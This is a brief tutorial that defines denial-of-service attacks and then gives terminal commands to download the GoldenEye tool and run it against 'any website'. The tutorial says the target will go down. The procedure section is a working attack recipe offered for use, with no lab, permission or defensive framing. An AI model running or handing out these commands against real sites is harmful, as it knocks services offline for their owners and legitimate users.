What is DOS attack?

Denial-of-service attack 

In computing, a denial-of-service attack (DoS attack) is a cyber-attack where the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled

Without wasting the time to explain about how the tool works and some additional information about it which you are anyways not interested to read. I will skip to the procedure part on How to use this tool to DOS attack on any website.

PROCEDURE:

REQUIREMENTS

• Kali linux

• Working Internet Connection.

INSTRUCTIONS

1. Fire up kali linux.
2. Download GoldenEye.
3. To Download the tool,Open terminal and Enter the following command " git clone https://github.com/jseidl/GoldenEye.git "
4. Now browse to the GoldenEye folder by typing the following command cd GoldenEye/
5. Now To attack the website type the following ./goldeneye.py <url> 
6. EG. ./goldeneye.py http://www.xyz.com/ 
7. Now check the website you Attacked. It Will be temporarily down.
